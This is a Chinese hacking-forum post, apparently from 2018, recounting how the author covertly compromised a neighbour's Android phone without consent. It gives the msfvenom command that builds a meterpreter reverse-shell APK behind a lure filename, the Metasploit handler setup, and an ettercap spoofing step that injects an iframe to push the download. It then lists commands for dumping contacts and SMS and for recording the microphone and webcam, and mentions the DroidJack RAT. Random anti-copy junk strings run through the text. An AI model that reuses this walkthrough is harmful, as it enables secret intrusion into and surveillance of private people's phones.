中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

4 `$ o; A+ M2 Y5 L4 m2 Z 五、msf+ettercap入侵邻居安卓手机 ( n: M# q4 Y8 f1 |% C5 g* P

: P4 K; z F- g0 K0 M5 d4 j

6 V5 Y! t$ ^" G+ d5 { 首先启动msf : y. A) [4 [6 J, r

+ P! s& E# J) P U- Z0 ~- |

8 s' \. ^$ u, C+ _+ v: K! _ 先用kali生成一个安卓木马,如下命令: 1 ] W7 R$ h# {$ y

$ _% Y$ f% [, Q2 ^

6 B) Z3 u# \2 X C0 P: w) o Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 4 f- t3 p2 l1 i( ~2 M! @

! J2 r9 s" l6 p

/ S1 U% o) u% M/ k3 M3 {9 t5 `& V- n 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ( E0 n4 `& r, x3 g( I7 a: p

# l8 B/ `* `1 e8 a) q5 ^: P

7 Q, a! k3 p$ b( ~# z7 z 然后进入msf 6 ^+ a* s/ @; m+ u% ?. c

+ |& T/ a+ Q' `$ g1 `, {; f

" `* q0 D0 _* j! S0 C) g use exploit/multi/handler 6 ~5 c1 o d# T' r3 v0 j# [3 x

' D' }- v. Q+ e8 u

# e: r$ M% x6 w, y set payload android/meterpreter/reverse_tcp ) y8 [$ n s$ M; O

6 ^8 s/ u2 |7 c+ x2 W* E. g3 ?' w

3 K. ]0 b2 o0 @& k5 r set LHOST 192.168.0.109 //ipkailiip ( M: k; k. |7 ]% T# S8 X

, k7 v. N5 T$ o1 n: F3 t- D, _

4 V+ {! X! T- F set LPORT 44444 //端口一定要与前面生成的木马的端口一致 6 b9 D. F6 {6 ^

: w O! d8 a2 r0 z% R ?3 ]

+ o) y; h- q4 S6 k0 _ Exploit & \* R$ h0 A2 p

7 q( o4 y+ `1 }* j0 J1 Z

5 g9 ~: g0 [' B5 L" ]2 H6 H   3 `' v& A1 m( Y6 E

7 q. o& n% w+ d' f% }# d

6 U9 }! o- W9 m" g$ T7 C$ A. n 下面我们开启ettercap -G ! d$ C7 l# H7 ` O

6 P9 g" ]* X/ t4 a# v) B

; G! v0 J+ Y. P. l% ^: J 我物理IP 3 m# S1 O' E' @/ x

, w* B; q) ?5 o1 f/ {) \

" z5 m5 ^ P: C# P5 _+ t# Q$ W, i   4 \) N6 y* z9 R! `3 b' p; B! i. V' R% ]

% e4 n y5 t4 g8 ^1 a3 x/ a, P

d0 i% {& R# F6 E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, + p9 ~- m) q% C6 }

" t7 E( q0 _; Z/ \' b- Q

8 T/ E' k$ C8 {5 x 下面我们来设置一下 - X( c8 {6 d# |

! U; M2 T, @7 ]" ?$ I8 {4 D& u2 n

7 m. N0 t8 Q; U# o+ l* C9 Y   ( s: x) f2 T$ g, L4 r0 B

1 T' k' | q, X9 C* M+ u- V

( Z! K' m- ]. c, L, z 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, . R% T4 a/ l3 I P8 ?

2 B+ B: m$ H! q& U) R

/ x0 g/ U9 h( P5 c% _   / L) R. W( V# t6 A0 y

4 S1 l7 s0 [$ p" I8 q8 c

- w, b' b2 U9 s! T! j; u   ' U. D, R$ I9 F8 a* Z

0 L1 R& a* t: g

8 s7 }- N s( w' I6 L6 i0 q   1 Q, s! [1 i4 z, a' N

, X6 E1 n R4 D9 w: v! b: Y+ z

: M- I3 C/ |8 P/ w+ r2 P   9 u8 b" B4 W% G) r* c

: C8 }* A6 P4 B _$ B8 J

% n4 W. n6 f; A2 @1 S. e# U   . P" g4 _3 D% ]: d0 @) Q; b

& f4 e# D, O; Y+ [4 A& z1 O, o& @ ]) `

* h, o' J' Q4 Y/ }. V   ' x) ~# u$ \/ r8 O8 m/ F# C/ b

3 Z# Q. z! X4 i6 d0 m( r* h

/ \8 k2 K1 L _4 g2 _3 q& O   . T# q. V8 ~4 N/ O" F; a

, J" s3 g8 K! l6 k/ A

* D6 w: Q/ J1 ~4 K) S0 h   & V9 G: s6 V3 ^# t: I8 V! J

# @/ G( T; @6 N6 t' _5 x n+ K

1 P, @) o+ I6 c   0 D8 o0 n8 |2 N( F

6 i3 {: ^, z! Y9 T* s( n

/ a- a8 ?; [: N4 W6 q   2 P7 u& V' F' l' ^8 w

1 |9 }7 q& `' W

1 M- e8 A; J: _* f$ }   $ H2 ^1 {# [1 Q& v R

4 P5 S9 T; B. Y" v( n

; w& f* x/ y2 {! [* x   5 }! u: W B9 o. H$ Z$ h9 K. X

. ]" W5 Q" f9 M$ s( b" u1 I

$ i- X) {0 l8 E   ! c' t, h9 V2 \1 \" h3 g

3 C" g' c3 `' x% U6 r5 o

9 _+ o# x; ], M$ o3 S9 ~ 下面我们开始攻击 4 m: Y/ e1 H7 T% G9 |% W

" K) q N! l3 X- o

: X( D- d& c3 b% y) W( E- H" c* o# A   7 V% B4 G, B! N' q: l& o

! F& h' t( c( B" _3 \2 L

2 q( ] A; r& b: l: U8 f8 h* }( F   9 J& o1 L r( K( X8 @* u

! B$ a. H+ M9 u }1 m' W1 ~ H% t1 ?

3 ^3 ^ \) a$ G/ ~- c   C2 ~% I* g- @3 |* V5 f

2 A/ q9 R7 F N

. [. X/ s* F- u, |   6 V6 R9 r1 U Q" {

1 z/ u1 E# ^% l \+ b1 J: Z: @! D

/ {% g/ z/ w8 M* u3 {- M, [   5 D# S! P4 {, @. Y [

x1 _ b: S; M9 e9 \( E4 h# b

' g1 l9 Q; [5 w) k% v 大概过了5分钟多,发现反弹成功了 9 B3 w& i6 W" k) N1 a( g9 k! ~

# R1 {* `4 T& a9 B! O9 N9 |7 ?

- U) L& O6 H8 N( e9 q$ o   , n0 Y! L1 T. z$ l$ z8 `8 m9 z5 x0 \

7 h; |: M" a" t. c: }0 C: z

( l+ q$ Y" f6 G: \   : q: K- k% X6 u3 K& `7 e9 u

) ]* F' @) G8 s+ h, ^! [- p

- I4 ]/ b* e1 ?6 g( j5 y. r0 r   0 y% M' N9 A9 e: T: r

" _+ f' a8 @ \- p4 a$ `" l

! b' N2 R, F" _- ?- b1 k+ k& R* L$ |   ( z3 b* X$ |) B8 |* u, a4 l, q

. p) t& b( u x e0 Z: z

* J+ P! u5 Y1 }3 s   ! t3 \ z/ v# L, x% ?7 a

9 _- K" D7 }. v0 r7 z: p- ~

5 Z- @1 ~6 [) j: F9 P   & w9 A. G3 p+ C8 w2 G

5 S: P! A' I' A3 A

3 d) B4 y7 C: o' m   9 h+ h' F: U8 }" O; r) u

6 M" B1 g2 ~* S$ o

! R( b9 `6 N- l 执行命令 / g" p! K, B8 \: \2 V

|$ J$ x6 b1 B8 D$ g

! ?+ t2 M4 f( L. U" Z1 j5 a   : `) c% E; ~" G4 D

( R, h# P N: j! r1 r% [, D

- R- L7 A: Z T. u* @% ^ dump_contacts    --》这个是导出电话 * w! q) O$ W- o

* h ^2 ~# ^: }1 `

( k' n0 F% Q9 j' L; ]' x. t: g, u dump_sms --》这个是导出信息 & n* `3 c+ P* h3 L$ m

7 s4 D0 T5 _2 ?7 m1 ]. f

6 i% O% u- X" M! Y! U& `; [# `3 s: T record_mic     Record audio from the default microphone for X seconds ( U% X; r" ]9 W- ~- g; ~

# Z4 Z* x$ p6 U& s& ]

+ H1 W- d7 b) u% o     webcam_chat    Start a video chat & D0 G7 j: H% q4 r) M9 Z" l

' v: L% F9 J% N

; V2 ]+ z! E( K# I3 Q t9 d     webcam_list    List webcams ! V" G' Q- [9 M+ X0 x

. D7 L* g( w/ C$ ^) F7 ]! p

6 t! t" M: Z( O2 C" s1 O# J( w     webcam_snap    Take a snapshot from the specified webcam + w; V: ?8 f X& r" \

" q9 C [, F# b+ ^

) s- H5 c. @" ?3 W; d! P# B webcam_stream  lay a video stream from the specified webcam $ C/ ^/ E1 k( J. F/ u

- x4 d- l; j! V9 B5 R

2 N3 E/ U# A& Z6 G0 A; A" N   ; ^+ V* q7 f: Q: a2 B% W

( _; a( J: e( p; L# B: l' P0 O" w

8 R W' V; F) Q" M% s   6 C; {. ?. ^6 s5 c# \

# r! {! J* j7 P+ p+ W" C

2 L- v% b- w( k f- f- H$ K$ x: { 我们打开看一下电话薄, ) w+ |8 t) h4 D& k

. ]$ `! q! C3 \8 ~. b( ~/ _4 y

, n; M' w% S5 `2 g( [9 O& N4 V   ; }4 Q4 |4 m, W0 e

- f4 i, F! w, ~; H/ Q

( d+ H6 k! c! F4 }$ L* a$ G( r0 T2 V   9 H( S( C# f) s: L1 Z

6 {& y! P( b5 Q

# @5 H8 {; x/ w" y$ c6 P   K7 S' B% w0 v. o8 I9 ]

9 p9 Z, h$ X% G% O) s! Z

: `* a, j' ]; O( L% _0 ~ f4 Q! `0 g   2 r* g. _- G4 K: J: N# ?: M5 @4 \

$ L' Q0 ^! s: e! A T- S2 {1 F) T; I

y! q, G9 X) F7 E; N   3 G' Z8 W+ v* M! x1 I

- a5 Q/ w& |9 } t3 |; G

k3 g! p! \4 H: o1 J+ ^   $ T5 f" D7 S/ r

. ~- R2 g* x5 K$ z0 l" U) I" l

2 C6 i$ _2 f) ^1 P1 O% R6 i 我们同时欺骗成DroidJack木马,使用方法如图: # Z5 p% I% Z" w0 b/ m: }* s

4 z6 O+ C( {* w. n* M8 y

; U" Y6 `. }5 _" I' u0 B6 J+ l9 H   $ R0 N3 {& [1 v/ q. q

0 _/ h3 q/ `* b

1 c' H8 Y' U f/ [1 z   + b/ D4 J+ M- K

) w3 }! {* S) P. }- y

" ~2 J9 I# O" g, R. B% g N   7 r; \6 E1 {2 u3 [, h8 V

/ O- B: D d2 e8 q/ F+ j4 |9 W

6 b1 O; L" g. ?) h, R3 s 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 h& t* k+ v! c% ?! h

0 J: O" s! R5 q v$ n, n

- O* n: s& v7 ~' T+ l4 o7 y; j   # S6 A& T p0 X$ t9 \

5 G3 `# o4 u) H' F4 \7 f2 W- K

. p4 d2 t5 @+ g! E5 B   2 @1 q. v# w" X R

# V; ], m/ i# b U# V' ]* `

% `" Q: u( E& {; \+ x. d1 E   : Q: X2 y% T- w1 K' F7 q

& |/ v5 F% }4 }$ t0 Y0 d# _

* d* k/ ?9 `9 p. G ; Z7 M9 ]2 r# N0 O

: {* Q( ?9 f5 {8 j

, f& J2 E0 E4 |+ y+ n
$ X8 C% {" b- A; ^! Y2 _





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2